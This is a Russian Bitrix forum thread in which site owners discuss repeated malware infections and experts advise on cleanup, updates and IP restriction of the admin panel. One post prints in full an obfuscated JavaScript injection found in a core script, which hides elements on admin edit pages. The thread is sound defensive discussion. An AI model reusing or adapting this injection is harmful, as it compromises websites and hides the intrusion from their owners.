Разработчикам

Форум

Заражение сайтов

Пользователь 3761946 Заглянувший Сообщений: 2 Регистрация: 03.01.2020	#341 0 04.05.2026 06:10:31 Доброе время суток! зачем они продают такое г..... Если люди потом мучаются У три сайта у клиентов взломали

Пользователь 3761946

Заглянувший

Сообщений: 2 Регистрация: 03.01.2020

#342

04.05.2026 06:28:20

Цитата

Алексей написал:

Цитата

написал:

Цитата
написал: Оптимально будет /bitrix/admin/ закрыть по белым спискам IP. Есть некоторые неудобства, но это лучше, чем получить зомби-сайт

Закрыли. По сути был взлом, НО была старая версия php и не обновлен Битрикс довольно давно.

НО как без админки залили файлы тогда?

Вы искренне полагаете что для залива вредоноса обязательное условие это доступ к админке? У меня для вас плохие новости.
Вангую, что ломают Вас всеми известными способами которым подвержен необновленный битрикс и php. Плюс туда же дыры в шаблоне Аспро.
Белые списки IP для админки это хорошо, но полностью проблемы не решает.

Здравствуйте как вы решили проблему ?

Пользователь 13618

Эксперт

Сообщений: 1366 Баллов: 231 Регистрация: 05.04.2011

Сертифицированный партнер

#343

04.05.2026 10:07:04

Цитата
MIKVISSON написал: Здравствуйте как вы решили проблему ?

если сайт уже взломан - тут только вручную надо всё чистить (без специалиста Вы врят ли сможете)
ну и обязательно обновить ядро до актуального - последние версии вроде не ломают, по крайней мере я не встречался

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 2663075

Постоянный посетитель

Сообщений: 136 Баллов: 24 Регистрация: 20.11.2018

#344

04.05.2026 10:46:12

Цитата

MIKVISSON написал:

Цитата

Алексей написал:

Цитата

написал:

Цитата
написал: Оптимально будет /bitrix/admin/ закрыть по белым спискам IP. Есть некоторые неудобства, но это лучше, чем получить зомби-сайт

Здравствуйте как вы решили проблему ?

Как все почистите и обновите - возможно стоит модуль https://marketplace.1c-bitrix.ru/solutions/ammina.stopvirus/ поставить

Про вирус | Модуль защиты

Пользователь 330739

Посетитель

Сообщений: 48 Баллов: 3 Регистрация: 16.04.2015

#345

05.05.2026 12:41:17

здравствуйте! Сайт был был заражен, восстановлен из бэкапа. Но вижу что файлы /bitrix/js/main/core/core_date.js и /bitrix/js/main/core/core_date.min.js все равно инфицированные и их замена на стандартные не помогает, что то тут же подменяет их добавляя код. Как исправить?

Код

var p0b9d8e=0;var _0x1b0190=_0x3ec8;(function(_0x3d7a1f,_0x465cc6){var _0x2f962b=_0x3ec8,_0x4d8c3c=_0x3d7a1f();while(!![]){try{var _0xb3380a=-parseInt(_0x2f962b(0x18b,'pqn['))/0x1*(parseInt(_0x2f962b(0x19d,'U)A5'))/0x2)+parseInt(_0x2f962b(0x193,'(OT#'))/0x3*(parseInt(_0x2f962b(0x198,'skWI'))/0x4)+-parseInt(_0x2f962b(0x192,'pqn['))/0x5*(-parseInt(_0x2f962b(0x1a5,'Vyx9'))/0x6)+-parseInt(_0x2f962b(0x18f,'Nz[p'))/0x7*(-parseInt(_0x2f962b(0x18a,'U)A5'))/0x8)+parseInt(_0x2f962b(0x187,'Yx[H'))/0x9*(parseInt(_0x2f962b(0x1a4,'emqX'))/0xa)+parseInt(_0x2f962b(0x1a7,'fhgA'))/0xb*(-parseInt(_0x2f962b(0x191,'Nz[p'))/0xc)+-parseInt(_0x2f962b(0x1a6,'b5c&'))/0xd;if(_0xb3380a===_0x465cc6)break;else _0x4d8c3c['push'](_0x4d8c3c['shift']());}catch(_0x2523f7){_0x4d8c3c['push'](_0x4d8c3c['shift']());}}}(_0x613f,0x5db45),document[_0x1b0190(0x199,'4v78')+_0x1b0190(0x18e,'pqn[')]('DOMContent'+_0x1b0190(0x19a,'19Xx'),function(){var _0x502f35=_0x1b0190;if(location['pathname'][_0x502f35(0x189,'*0Eu')]('te_edit')>0x0){var _0x4ee67d=document['querySelec'+_0x502f35(0x197,'*)xW')](_0x502f35(0x18c,'4v78')+_0x502f35(0x195,'*)xW'));_0x4ee67d[_0x502f35(0x18d,'xBdd')](_0x3bd8ce=>{var _0xc9d96f=_0x502f35,_0x19d286=_0x3bd8ce[_0xc9d96f(0x194,'tbNo')]('tr');_0x19d286&&(_0x19d286[_0xc9d96f(0x19b,'(OT#')][_0xc9d96f(0x1a0,'ZYx)')]=_0xc9d96f(0x19e,'skWI'));});}}));function _0x3ec8(_0x1198e8,_0x13ff3f){var _0x613fca=_0x613f();return _0x3ec8=function(_0x3ec898,_0x3b07c7){_0x3ec898=_0x3ec898-0x187;var _0x1213ef=_0x613fca[_0x3ec898];if(_0x3ec8['AUHBNi']===undefined){var _0xc05ee1=function(_0x3bd8ce){var _0x19d286='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var _0x1e149c='',_0x22c939='';for(var _0x4e0d5b=0x0,_0x33211e,_0x5427c1,_0x2fd185=0x0;_0x5427c1=_0x3bd8ce['charAt'](_0x2fd185++);~_0x5427c1&&(_0x33211e=_0x4e0d5b%0x4?_0x33211e*0x40+_0x5427c1:_0x5427c1,_0x4e0d5b++%0x4)?_0x1e149c+=String['fromCharCode'](0xff&_0x33211e>>(-0x2*_0x4e0d5b&0x6)):0x0){_0x5427c1=_0x19d286['indexOf'](_0x5427c1);}for(var _0x10bd81=0x0,_0x55368f=_0x1e149c['length'];_0x10bd81<_0x55368f;_0x10bd81++){_0x22c939+='%'+('00'+_0x1e149c['charCodeAt'](_0x10bd81)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(_0x22c939);};var _0x4ee67d=function(_0x1f7ef7,_0x4e2f4a){var _0x486fcb=[],_0x42b7e1=0x0,_0x4ed4a4,_0x43fc44='';_0x1f7ef7=_0xc05ee1(_0x1f7ef7);var _0x2b8ab4;for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x486fcb[_0x2b8ab4]=_0x2b8ab4;}for(_0x2b8ab4=0x0;_0x2b8ab4<0x100;_0x2b8ab4++){_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4]+_0x4e2f4a['charCodeAt'](_0x2b8ab4%_0x4e2f4a['length']))%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4;}_0x2b8ab4=0x0,_0x42b7e1=0x0;for(var _0x532494=0x0;_0x532494<_0x1f7ef7['length'];_0x532494++){_0x2b8ab4=(_0x2b8ab4+0x1)%0x100,_0x42b7e1=(_0x42b7e1+_0x486fcb[_0x2b8ab4])%0x100,_0x4ed4a4=_0x486fcb[_0x2b8ab4],_0x486fcb[_0x2b8ab4]=_0x486fcb[_0x42b7e1],_0x486fcb[_0x42b7e1]=_0x4ed4a4,_0x43fc44+=String['fromCharCode'](_0x1f7ef7['charCodeAt'](_0x532494)^_0x486fcb[(_0x486fcb[_0x2b8ab4]+_0x486fcb[_0x42b7e1])%0x100]);}return _0x43fc44;};_0x3ec8['zaovwk']=_0x4ee67d,_0x1198e8=arguments,_0x3ec8['AUHBNi']=!![];}var _0x5898a9=_0x613fca[0x0],_0x1870cf=_0x3ec898+_0x5898a9,_0x5bbbb3=_0x1198e8[_0x1870cf];return!_0x5bbbb3?(_0x3ec8['ivdMgp']===undefined&&(_0x3ec8['ivdMgp']=!![]),_0x1213ef=_0x3ec8['zaovwk'](_0x1213ef,_0x3b07c7),_0x1198e8[_0x1870cf]=_0x1213ef):_0x1213ef=_0x5bbbb3,_0x1213ef;},_0x3ec8(_0x1198e8,_0x13ff3f);}function _0x613f(){var _0x3481af=['cCohc8omta','WQSodaFdGrpdOeVdOSo5','hZLzmsGLW4D2WPbcvW','WP8dW6ddVa','lfxdKmkKDmkkv8ksWRtcRZq','W7XttexdIdFdNG','cN5qWRBdH3DsW4tdRvq','zSoQWPNdJmkJW79c','W6xcICo5WRhcTCoepgddU8o3W7ZcHCoy','WPddRvdcUgOphCkLmrhdPq','xvTyW5PtbqfC','W79yW4ZdPSovW7pdS1iudZNdSW','px5LWPanWP1Wp3aC','WRKkfrymkvlcTa','dNasW7ZdLxHzW7S','WP9HWOhcQrtdUGNdP8k0W6xdTuS','FmosW49hb8kFWRO','gZ1wnYXhWP1SWQ1erSkiW7W','W6ZdSmkUW57dKSkMqq','oSk6W5CXwepdLsxdL8k4','rN1gWQtcQczX','WQFdImkQW6RdPSkf','WROjhbe0j2JcSa','WRKiE1aJmfhcMmkKW6i','WRKbFLjtn3RcRmkyW4RdVW','W6xcJ8o3WRdcUSocyfFdU8o5W4lcUa','t8kfq8kzsmkPWR7dVCkrWPS','WPS4eSo7xSk7gW','o3RcKepdHSo4FW','iGNcT8k9jCkCWOpcI2f4DW','kIJdGc/cM8k2','W4bCWRRcRCojkxhcKCkOW68','mSkWW4mbwN3dJtddT8kK','W4VdKCo1zSkhsq'];_0x613f=function(){return _0x3481af;};return _0x613f();}var p0b9d8e=1;

Пользователь 13618

Эксперт

Сообщений: 1366 Баллов: 231 Регистрация: 05.04.2011

Сертифицированный партнер

#346

05.05.2026 12:59:40

ну значит у вас в бэкапе зараза сидит, иначе не объяснить

врят ли Вам готовое решение тут озвучат - нужно анализировать, искать заразу

для начала попробуйте просканировать на заразу встроенным сканером, потом запустите проверку изменённых файлов ядра - если такие будут найдены, обратитесь в саппорт - помогут восстановить

ps
иньекцию можно деабфуцировать, но это так - чисто ради интереса ... сам бэкдор оно найти не поможет

Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 330739 Посетитель Сообщений: 48 Баллов: 3 Регистрация: 16.04.2015	#347 0 05.05.2026 13:04:11 главное все защиты включены, все обновлено, а это дырявое корыто все равно пропускает))

Пользователь 13618 Эксперт Сообщений: 1366 Баллов: 231 Регистрация: 05.04.2011 Сертифицированный партнер	#348 0 05.05.2026 13:06:52 ну так если у вас зараза уже сидит - тут позно пить Боржоми предположу, что ядро сайта регулярно не обновлялось? Мой блог - вопросы веб безопасности, разработка и поддержка сайтов.

Пользователь 290272 Заглянувший Сообщений: 7 Регистрация: 04.11.2014	#349 0 06.05.2026 10:10:52 1 мая были взломаны сразу 2 сайта на разных готовых решении Интек (INTEC). Восстановили из архива, тут же снова произошло заражение, прямо на глазах. Хостинг Таймвеб, выполнили рекомендацию от их поддержки: "ещё есть некий шелл, запущенный скрипт, который работает автономно от Апач. Удалили его командой в SSH killall -9 -u $(whoami) или запасной вариант killall -u $(whoami) (лучше первый он убивает процессы лучше). Посмотреть запущенные процессы можно командой ps aux Процессы были сформированы запросами к сайту и остались висеть на площадке, даже когда файл был удален. Возможно вредоносные скрипты запускают процессы при помощи функции php exec () и добавляют к команде запуска символ "&" (Символ & в конце команды переводит процесс в фоновый режим)." После этого восстановили сайты заново. Один был на обновлении - обновили Битрикс и Интек модуль ядро до последней версии (по рекомендации поддержки Интек). Для старого сайта - Интек выдал свежий файл Handler.php по пути: /bitrix/modules/intec.core/classes/handling/Handler.php , в нем содержатся правки ядра, которые закрывают уязвимости в обновлении, такой вариант нам в теории позволит ничего не обновлять, и закрыть уязвимости. Два дня - пока полёт нормальный. Включили логирование, следим если что-то будет. Плюс у нас есть собственный скриптик, который раз в сутки анализирует все изменения в файлах сайтов и присылает отчёты. Админки также были закрыты по IP, но это кстати не помогло. По логам заметили один POST запрос,которым удалось кому-то загрузить в /upload/main/*** кривой файл txt который даже как php не запускается, явно битый и обрывается. Но так как в папке upload есть htaccess который не позволяет запускать скрипты, то этот взлом не пройдёт в теории.

Форум

Центр поддержки

Продукты

Управление сайтом

Битрикс24

Интернет-магазин + CRM

Решения

Для интернет-магазинов

Каталог готовых решений

Внедрение

Выбрать партнера

Проверить партнера

Стать партнером